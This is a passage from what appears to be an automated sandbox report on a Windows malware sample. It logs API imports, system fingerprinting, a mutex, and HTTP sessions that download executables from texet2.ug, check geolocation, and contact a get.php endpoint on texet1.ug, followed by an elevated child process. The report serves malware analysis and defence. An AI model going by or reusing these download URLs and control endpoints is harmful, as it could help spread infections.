Get Address c:\windows\syswow64\advapi32.dll function = CryptReleaseContext, address_out = 0x74d4e124 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = GetUserNameW, address_out = 0x74d5157a True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptHashData, address_out = 0x74d4df36 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegSetValueExW, address_out = 0x74d514d6 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegCloseKey, address_out = 0x74d5469d True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptDestroyHash, address_out = 0x74d4df66 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = ControlService, address_out = 0x74d67144 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegOpenKeyExW, address_out = 0x74d5468d True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptCreateHash, address_out = 0x74d4df4e True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptEncrypt, address_out = 0x74d6779b True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptImportKey, address_out = 0x74d4c532 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = QueryServiceStatus, address_out = 0x74d52a86 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegQueryValueExW, address_out = 0x74d546ad True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CloseServiceHandle, address_out = 0x74d5369c True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = SHGetPathFromIDListW, address_out = 0x760617bf True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = SHGetSpecialFolderLocation, address_out = 0x7605e141 True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = CommandLineToArgvW, address_out = 0x75fe9ee8 True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = ShellExecuteA, address_out = 0x76217078 True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = ShellExecuteExW, address_out = 0x75ff1e46 True 1
Fn
Get Address c:\windows\syswow64\ole32.dll function = CoInitialize, address_out = 0x755fb636 True 1
Fn
Get Address c:\windows\syswow64\ole32.dll function = CoInitializeSecurity, address_out = 0x75607259 True 1
Fn
Get Address c:\windows\syswow64\ole32.dll function = CoUninitialize, address_out = 0x756286d3 True 1
Fn
Get Address c:\windows\syswow64\ole32.dll function = CoCreateInstance, address_out = 0x75629d0b True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = 202, address_out = 0x7522fd6b True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = 2, address_out = 0x75224642 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = 9, address_out = 0x75223eae True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = 8, address_out = 0x75223ed5 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = 6, address_out = 0x75223e59 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = 200, address_out = 0x75223f21 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = 12, address_out = 0x75225dee True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = 201, address_out = 0x75224af8 True 1
Fn
Get Address c:\windows\syswow64\iphlpapi.dll function = GetAdaptersInfo, address_out = 0x74b49263 True 1
Fn
Get Address c:\windows\syswow64\ws2_32.dll function = 12, address_out = 0x75bcb131 True 1
Fn
Get Address c:\windows\syswow64\ws2_32.dll function = 11, address_out = 0x75bc311b True 1
Fn
Get Address c:\windows\syswow64\ws2_32.dll function = 52, address_out = 0x75bd7673 True 1
Fn
Get Address c:\windows\syswow64\dnsapi.dll function = DnsQuery_W, address_out = 0x74a8572c True 1
Fn
Get Address c:\windows\syswow64\dnsapi.dll function = DnsFree, address_out = 0x74a7436b True 1
Fn
Get Address c:\windows\syswow64\crypt32.dll function = CryptStringToBinaryA, address_out = 0x759e5d77 True 1
Fn
Get Address c:\windows\syswow64\msvcr100.dll function = atexit, address_out = 0x749cc544 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = InitializeCriticalSectionEx, address_out = 0x76c34d28 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateEventExW, address_out = 0x76cb410b True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateSemaphoreExW, address_out = 0x76cb4195 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetThreadStackGuarantee, address_out = 0x76c3d31f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateThreadpoolTimer, address_out = 0x76c4ee7e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetThreadpoolTimer, address_out = 0x7717441c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WaitForThreadpoolTimerCallbacks, address_out = 0x7719c50e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CloseThreadpoolTimer, address_out = 0x7719c381 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateThreadpoolWait, address_out = 0x76c4f088 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetThreadpoolWait, address_out = 0x771805d7 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CloseThreadpoolWait, address_out = 0x7719ca24 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlushProcessWriteBuffers, address_out = 0x77150b8c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FreeLibraryWhenCallbackReturns, address_out = 0x7720fde8 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcessorNumber, address_out = 0x771a1e1d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetLogicalProcessorInformation, address_out = 0x76cb4761 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateSymbolicLinkW, address_out = 0x76cacd11 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetDefaultDllDirectories, address_out = 0x0 False 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EnumSystemLocalesEx, address_out = 0x76cb424f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CompareStringEx, address_out = 0x76cb46b1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetDateFormatEx, address_out = 0x76cc6676 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetLocaleInfoEx, address_out = 0x76cb4751 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetTimeFormatEx, address_out = 0x76cc65f1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetUserDefaultLocaleName, address_out = 0x76cb47c1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsValidLocaleName, address_out = 0x76cb47e1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LCMapStringEx, address_out = 0x76cb47f1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentPackageId, address_out = 0x0 False 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetTickCount64, address_out = 0x76c4eee0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetFileInformationByHandleExW, address_out = 0x0 False 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetFileInformationByHandleW, address_out = 0x0 False 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EnumProcesses, address_out = 0x0 False 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EnumProcessModules, address_out = 0x0 False 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleBaseNameW, address_out = 0x0 False 1
Fn
Get Address c:\windows\syswow64\psapi.dll function = EnumProcesses, address_out = 0x75141544 True 1
Fn
Get Address c:\windows\syswow64\psapi.dll function = EnumProcessModules, address_out = 0x75141408 True 1
Fn
Get Address c:\windows\syswow64\psapi.dll function = GetModuleBaseNameW, address_out = 0x7514152c True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = SHGetFolderPathA, address_out = 0x760e7804 True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = SHGetFolderPathW, address_out = 0x76055708 True 58
Fn
Service (2)
»
Operation Additional Information Success Count Logfile
Open database_name = SERVICES_ACTIVE_DATABASE False 1
Fn
Open Manager database_name = SERVICES_ACTIVE_DATABASE True 1
Fn
User (1)
»
Operation Additional Information Success Count Logfile
Get Username user_name_out = 5p5NrGJn0jS HALPmcxz True 1
Fn
Window (1)
»
Operation Window Name Additional Information Success Count Logfile
Create LPCWSTRszTitle class_name = LPCWSTRszWindowClass, wndproc_parameter = 0 True 1
Fn
System (10)
»
Operation Additional Information Success Count Logfile
Get Computer Name result_out = XDUWTFONO True 1
Fn
Sleep duration = 40000 milliseconds (40.000 seconds) True 1
Fn
Sleep duration = 1000 milliseconds (1.000 seconds) True 1
Fn
Get Time type = System Time, time = 1627-02-27 16:55:45 (UTC) True 1
Fn
Get Time type = Ticks, time = 104817 True 1
Fn
Get Time type = Performance Ctr, time = 16257882976 True 1
Fn
Get Time type = System Time, time = 1627-02-27 16:55:46 (UTC) True 1
Fn
Get Time type = Performance Ctr, time = 16363332043 True 1
Fn
Get Time type = System Time, time = 1627-02-27 16:55:48 (UTC) True 1
Fn
Get Info type = Operating System True 1
Fn
Mutex (1)
»
Operation Additional Information Success Count Logfile
Create mutex_name = {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} True 1
Fn
Environment (2)
»
Operation Additional Information Success Count Logfile
Get Environment String - True 2
Fn
Data
Network Behavior
HTTP Sessions (8)
»
Information Value
Total Data Sent 4.14 KB
Total Data Received 6.24 MB
Contacted Host Count 3
Contacted Hosts 77.123.139.189, 185.162.131.70, 188.93.127.108
HTTP Session #1
»
Information Value
User Agent Microsoft Internet Explorer
Server Name texet2.ug
Server Port 80
Username -
Password -
Data Sent 602 bytes
Data Received 1.04 MB
Operation Additional Information Success Count Logfile
Open Session user_agent = Microsoft Internet Explorer, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = http, server_name = texet2.ug, server_port = 80 True 1
Fn
Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /tesptc/penelop/updatewin1.exe True 1
Fn
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = http://texet2.ug/tesptc/penelop/updatewin1.exe True 1
Fn
Query HTTP Info flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 True 1
Fn
Data
Read Response size = 10240, size_out = 10240 True 27
Fn
Data
Read Response size = 10240, size_out = 2560 True 1
Fn
Data
Close Session - True 1
Fn
HTTP Session #2
»
Information Value
User Agent Microsoft Internet Explorer
Server Name texet2.ug
Server Port 80
Username -
Password -
Data Sent 602 bytes
Data Received 1.04 MB
Operation Additional Information Success Count Logfile
Open Session user_agent = Microsoft Internet Explorer, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = http, server_name = texet2.ug, server_port = 80 True 1
Fn
Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /tesptc/penelop/updatewin2.exe True 1
Fn
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = http://texet2.ug/tesptc/penelop/updatewin2.exe True 1
Fn
Query HTTP Info flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 True 1
Fn
Data
Read Response size = 10240, size_out = 10240 True 27
Fn
Data
Read Response size = 10240, size_out = 4608 True 1
Fn
Data
Close Session - True 1
Fn
HTTP Session #3
»
Information Value
User Agent Microsoft Internet Explorer
Server Name texet2.ug
Server Port 80
Username -
Password -
Data Sent 602 bytes
Data Received 1.04 MB
Operation Additional Information Success Count Logfile
Open Session user_agent = Microsoft Internet Explorer, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = http, server_name = texet2.ug, server_port = 80 True 1
Fn
Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /tesptc/penelop/updatewin.exe True 1
Fn
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = http://texet2.ug/tesptc/penelop/updatewin.exe True 1
Fn
Query HTTP Info flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 True 1
Fn
Data
Read Response size = 10240, size_out = 10240 True 27
Fn
Data
Read Response size = 10240, size_out = 7680 True 1
Fn
Data
Close Session - True 1
Fn
HTTP Session #4
»
Information Value
User Agent Microsoft Internet Explorer
Server Name texet2.ug
Server Port 80
Username -
Password -
Data Sent 602 bytes
Data Received 1.04 MB
Operation Additional Information Success Count Logfile
Open Session user_agent = Microsoft Internet Explorer, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = http, server_name = texet2.ug, server_port = 80 True 1
Fn
Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /tesptc/penelop/3.exe True 1
Fn
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = http://texet2.ug/tesptc/penelop/3.exe True 1
Fn
Query HTTP Info flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 True 1
Fn
Data
HTTP Session #5
»
Information Value
User Agent Microsoft Internet Explorer
Server Name texet2.ug
Server Port 80
Username -
Password -
Data Sent 602 bytes
Data Received 1.04 MB
Operation Additional Information Success Count Logfile
Open Session user_agent = Microsoft Internet Explorer, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = http, server_name = texet2.ug, server_port = 80 True 1
Fn
Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /tesptc/penelop/4.exe True 1
Fn
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = http://texet2.ug/tesptc/penelop/4.exe True 1
Fn
Query HTTP Info flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 True 1
Fn
Data
HTTP Session #6
»
Information Value
User Agent Microsoft Internet Explorer
Server Name texet2.ug
Server Port 80
Username -
Password -
Data Sent 602 bytes
Data Received 1.04 MB
Operation Additional Information Success Count Logfile
Open Session user_agent = Microsoft Internet Explorer, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = http, server_name = texet2.ug, server_port = 80 True 1
Fn
Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /tesptc/penelop/5.exe True 1
Fn
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = http://texet2.ug/tesptc/penelop/5.exe True 1
Fn
Query HTTP Info flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 True 1
Fn
Data
Read Response size = 10240, size_out = 10240 True 23
Fn
Data
Read Response size = 10240, size_out = 8192 True 1
Fn
Data
Close Session - True 1
Fn
HTTP Session #7
»
Information Value
Server Name api.2ip.ua
Server Port 443
Username -
Password -
Data Sent 467 bytes
Data Received 7.19 KB
Operation Additional Information Success Count Logfile
Open Session user_agent = Microsoft Internet Explorer, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = https, server_name = api.2ip.ua, server_port = 443 True 1
Fn
Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /geo.json True 1
Fn
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = https://api.2ip.ua/geo.json True 1
Fn
Read Response size = 10240, size_out = 465 True 1
Fn
Data
Close Session - True 1
Fn
HTTP Session #8
»
Information Value
Server Name texet1.ug
Server Port 80
Username -
Password -
Data Sent 164 bytes
Data Received 285 bytes
Operation Additional Information Success Count Logfile
Open Session user_agent = Microsoft Internet Explorer, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = http, server_name = texet1.ug, server_port = 80 True 1
Fn
Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /AJShduiwtyt7858345iasd43/AJshd78458hIsdfSdf/get.php True 1
Fn
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = http://texet1.ug/AJShduiwtyt7858345iasd43/AJshd78458hIsdfSdf/get.php?pid=711BCE0E5BC884176929A7862BF0A291&first=true True 1
Fn
Read Response size = 1024, size_out = 103 True 1
Fn
Data
Close Session - True 1
Fn
Process #6: updatewin1.exe
671 0
»
Information Value
ID #6
File Name c:\users\5p5nrgjn0js halpmcxz\appdata\local\d5bfbe52-943a-4f73-97b1-39918fa00598\updatewin1.exe
Command Line "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\d5bfbe52-943a-4f73-97b1-39918fa00598\updatewin1.exe"
Initial Working Directory C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\
Monitor Start Time: 00:00:47, Reason: Child Process
Unmonitor End Time: 00:00:49, Reason: Self Terminated
Monitor Duration 00:00:01
OS Process Information
»
Information Value
PID 0x7a8
Parent PID 0x714 (c:\users\5p5nrgjn0js halpmcxz\desktop\a959.tmp.exe)
Bitness 32-bit
Is Created or Modified Executable True
Integrity Level High (Elevated)
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x 59C
0x 6E4
0x 354
0x 114
0x 7A0
Memory Dumps
»
Name Start VA End VA Dump Reason PE Rebuilds Bitness Entry Points AV YARA Actions
updatewin1.exe 0x00400000 0x0044CFFF Relevant Image - 32-bit - False False
buffer 0x00295000 0x00295FFF Marked Executable - 32-bit - False False
updatewin1.exe 0x00400000 0x0044CFFF Process Termination - 32-bit - False False
Hook Information
»
Type Installer Target Size Information Actions
IAT private_0x0000000000280000:+0x16795 104. entry of updatewin1.exe 4 bytes kernel32.dll:GetConsoleCP+0x0 now points to pagefile_0x00000000008b0000:+0x6bf6f6
Host Behavior
File (6)
»
Operation Filename Additional Information Success Count Logfile
Open STD_INPUT_HANDLE - True 2
Fn
Open STD_OUTPUT_HANDLE - True 2
Fn
Open STD_ERROR_HANDLE - True 2
Fn
Process (1)
»
Operation Process Additional Information Success Count Logfile
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\d5bfbe52-943a-4f73-97b1-39918fa00598\updatewin1.exe show_window = SW_SHOW True 1
Fn
Module (154)
»
Operation Module Additional Information Success Count Logfile
Load kernel32.dll base_address = 0x76c20000 True 2
Fn
Load KERNEL32.dll base_address = 0x76c20000 True 1
Fn
Load ADVAPI32.dll base_address = 0x74d40000 True 1
Fn
Load SHELL32.dll base_address = 0x75fd0000 True 1
Fn
Load SHLWAPI.dll base_address = 0x75340000 True 1
Fn
Load msvcr100.dll base_address = 0x749b0000 True 1
Fn
Load api-ms-win-core-synch-l1-2-0 base_address = 0x0 False 2
Fn
Load kernel32 base_address = 0x0 False 2
Fn
Load kernel32 base_address = 0x76c20000 True 2
Fn
Load api-ms-win-core-fibers-l1-1-1 base_address = 0x0 False 2
Fn
Load api-ms-win-core-localization-l1-2-1 base_address = 0x0 False 1
Fn
Load api-ms-win-appmodel-runtime-l1-1-2 base_address = 0x0 False 1
Fn
Get Handle c:\windows\syswow64\kernel32.dll base_address = 0x76c20000 True 11
Fn
Get Handle c:\users\5p5nrgjn0js halpmcxz\appdata\local\d5bfbe52-943a-4f73-97b1-39918fa00598\updatewin1.exe base_address = 0x400000 True 2
Fn
Get Handle mscoree.dll - False 1
Fn
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\local\d5bfbe52-943a-4f73-97b1-39918fa00598\updatewin1.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\d5bfbe52-943a-4f73-97b1-39918fa00598\updatewin1.exe, size = 260 True 1
Fn
Get Filename api-ms-win-core-localization-l1-2-1 process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\local\d5bfbe52-943a-4f73-97b1-39918fa00598\updatewin1.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\d5bfbe52-943a-4f73-97b1-39918fa00598\updatewin1.exe, size = 260 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsAlloc, address_out = 0x76c34f2b True 3
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsGetValue, address_out = 0x76c31252 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsSetValue, address_out = 0x76c34208 True 3
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsFree, address_out = 0x76c3359f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EncodePointer, address_out = 0x77170fcb True 9
Fn
Get Address c:\windows\syswow64\kernel32.dll function = DecodePointer, address_out = 0x77169d35 True 4
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateToolhelp32Snapshot, address_out = 0x76c5735f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = Module32FirstW, address_out = 0x76c579f9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = VirtualAlloc, address_out = 0x76c31856 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = VirtualProtect, address_out = 0x76c3435f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = VirtualFree, address_out = 0x76c3186e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetVersionExA, address_out = 0x76c33519 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TerminateProcess, address_out = 0x76c4d802 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = ExitProcess, address_out = 0x76c37a10 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetErrorMode, address_out = 0x76c31b00 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateFileA, address_out = 0x76c353c6 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WriteFile, address_out = 0x76c31282 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlushFileBuffers, address_out = 0x76c3469b True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CloseHandle, address_out = 0x76c31410 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateProcessA, address_out = 0x76c31072 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcpyW, address_out = 0x76c53102 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateProcessW, address_out = 0x76c3103d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WaitForSingleObject, address_out = 0x76c31136 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateFileW, address_out = 0x76c33f5c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrlenA, address_out = 0x76c35a4b True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WideCharToMultiByte, address_out = 0x76c3170d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = MultiByteToWideChar, address_out = 0x76c3192e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCommandLineW, address_out = 0x76c35223 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WriteConsoleW, address_out = 0x76c57aca True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetFilePointerEx, address_out = 0x76c4c807 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetConsoleMode, address_out = 0x76c31328 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = DeleteFileA, address_out = 0x76c35444 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapReAlloc, address_out = 0x77171f6e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapSize, address_out = 0x77163002 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetProcessHeap, address_out = 0x76c314e9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LCMapStringW, address_out = 0x76c317b9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetStringTypeW, address_out = 0x76c31946 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetFileType, address_out = 0x76c33531 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetStdHandle, address_out = 0x76cb454f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcatA, address_out = 0x76c52b7a True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcpyA, address_out = 0x76c52a9d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetEnvironmentVariableA, address_out = 0x76c333a0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetShortPathNameA, address_out = 0x76c5594d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleFileNameA, address_out = 0x76c314b1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetConsoleCP, address_out = 0x76cd7bff True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetLastError, address_out = 0x76c311a9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FreeEnvironmentStringsW, address_out = 0x76c351cb True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetEnvironmentStringsW, address_out = 0x76c351e3 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCommandLineA, address_out = 0x76c351a1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCPInfo, address_out = 0x76c35189 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetOEMCP, address_out = 0x76c5d1a1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsValidCodePage, address_out = 0x76c34493 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = UnhandledExceptionFilter, address_out = 0x76c5772f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetUnhandledExceptionFilter, address_out = 0x76c387c9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcess, address_out = 0x76c31809 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsProcessorFeaturePresent, address_out = 0x76c35235 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = QueryPerformanceCounter, address_out = 0x76c31725 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcessId, address_out = 0x76c311f8 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentThreadId, address_out = 0x76c31450 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetSystemTimeAsFileTime, address_out = 0x76c33509 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = InitializeSListHead, address_out = 0x771694a4 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsDebuggerPresent, address_out = 0x76c34a5d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetStartupInfoW, address_out = 0x76c34d40 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleHandleW, address_out = 0x76c334b0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = RtlUnwind, address_out = 0x76c5d1c3 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = RaiseException, address_out = 0x76c358a6 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetLastError, address_out = 0x76c311c0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EnterCriticalSection, address_out = 0x771522b0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LeaveCriticalSection, address_out = 0x77152270 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = DeleteCriticalSection, address_out = 0x771645f5 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = InitializeCriticalSectionAndSpinCount, address_out = 0x76c31916 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TlsAlloc, address_out = 0x76c349ad True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TlsGetValue, address_out = 0x76c311e0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TlsSetValue, address_out = 0x76c314fb True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TlsFree, address_out = 0x76c33587 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FreeLibrary, address_out = 0x76c334c8 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetProcAddress, address_out = 0x76c31222 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LoadLibraryExW, address_out = 0x76c3495d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetStdHandle, address_out = 0x76c351b3 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleFileNameW, address_out = 0x76c34950 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleHandleExW, address_out = 0x76c34a6f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetACP, address_out = 0x76c3179c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapAlloc, address_out = 0x7715e026 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapFree, address_out = 0x76c314c9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FindClose, address_out = 0x76c34442 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FindFirstFileExW, address_out = 0x76c41811 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FindNextFileW, address_out = 0x76c354ee True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegOpenKeyExW, address_out = 0x74d5468d True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegCloseKey, address_out = 0x74d5469d True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegCreateKeyExW, address_out = 0x74d540fe True 1
Fn
